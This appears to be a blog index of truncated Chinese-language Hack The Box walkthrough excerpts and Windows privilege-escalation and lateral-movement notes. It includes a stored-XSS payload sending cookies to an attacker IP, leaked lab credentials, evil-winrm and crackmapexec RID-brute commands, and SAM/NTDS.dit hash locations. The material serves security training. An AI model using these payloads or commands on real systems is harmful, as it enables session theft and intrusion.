HTB-Doggit泄露利用rustscan进行扫描 22和80端口开放。 访问80端口发现是一个 Backdrop CMS，扫一下后台，发现是一个git泄露。 利用Githack进行一波扫描，在settings.php中发现mysql的用户名和密码。 1mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop 通过信息收集，能发现它是一个1.2

windows提权_2对windows的一些常见的提权手法进行一个总结 windows 系统内核提权漏洞缓冲区溢出漏洞，通过修改内存中变量的值，可以劫持进程，执行恶意代码，最终获取到系统权限。 通过查看系统补丁，看当前系统哪些没有进行打补丁，就去寻找相关的漏洞。 windows不同系统提取的漏洞和补丁的相关信息 1.手动寻找补丁信息： 12systeminfowmic qfe get captio

内网横向基础总结获取域内单机密码和Hash在windows 2000以后 windows都采用NTLM对用户的密码进行加密 通常保存在%SystemRoot%\System32\config\SAM文件中(如果是域环境中通常保存在NTDS.dit文件中)，除了NTLM还有LM加密方式，SAM和NTDS.dit里面存放的内容如下： 1username : RID : LM Hash : NTLM H

HTB-Titanic信息收集22 80端口开放 将域名和ip进行一个映射。然后扫后台，没扫出什么，尝试爆破子域名。 存在一个子域名，dev 添加进去。 dev的子域名是一个Gitea。然后接着扫后台，查看sitemap.xml 里面存放着另外一个子域名。 ** 这个gitea其实也就是titanic 之前扫到的后台还有这个信息，去访问看一下信息，里面存放着源码信息，以及一个数据库的密码。 这

Return信息收集 访问80端口 是一个打印机。 这个地方可以利用ldap回传攻击 将ip改成自己的vpn的ip 然后端口不变，进行一个监听 得到密码 1edFg43012!! 漏洞利用上面的5985端口开启 可以试试winrm登录 1evil-winrm -i 10.10.11.108 -u "svc-printer" -p '1edFg43012!!

HTB-Heal信息收集扫描端口信息 22和80端口开放。 将域名和对应ip添加到/etc/hosts中 扫下后台 123/index.html/robots.txt/manifest.json 没什么有用的信息。 进行子域名爆破，看是否存在子域名。 1ffuf -w subdomains-top1million-110000.txt -u http://heal.htb/ -H &quo

HTB-Backfire信息收集8000 22 443端口开启。 访问8000端口 发现有两个文件 漏洞利用下载下来看看 发现是一个Havoc 经过搜索得到一个SSRF的漏洞 参考链接：https://github.com/HimmeL-Byte/CVE-2024-41570-SSRF-RCE 尝试着打一下 发现可以 登录进去之后发现shell并不长久 我们可以通过ssh的公私钥对 进行一个

HTB-cat信息收集 22 80端口开放 然后将cat.htb添加到/etc/hosts中 扫描后台 发现git泄露 将git泄露的代码拉下来审计 发现一个xss的 username和email未经过验证就被写进数据库中，这里能写入存储型的xss 获取cookie: 1<script>document.location='http://10.10.14.68:8888

HTB-Tricksterlinux 中等难度 信息收集端口扫描发现22和80端口开放 访问80端口 发现并不能访问它的服务 做一下映射 将域名添加到/etc/hosts中。 第一个网站扫后台扫到了一个assets 没找到什么有用的信息 第二个网站是一个PrestaSHop 网上搜了大部分是sql注入漏洞 注册一个账户登录进去看看。 没啥东西，扫后台可以知道是一个git泄露 利用GitH

HTB-Cicada信息收集 端口开放 445 利用smbclient查看一下共享资源。 在HR下 找到一个txt文件 下载下来。 漏洞利用在txt里面得到一个账户默认的密码，但是用户名并不知道，需要枚举。 1crackmapexec smb 10.10.11.35 -u "guest" -p " " --rid-brute | grep "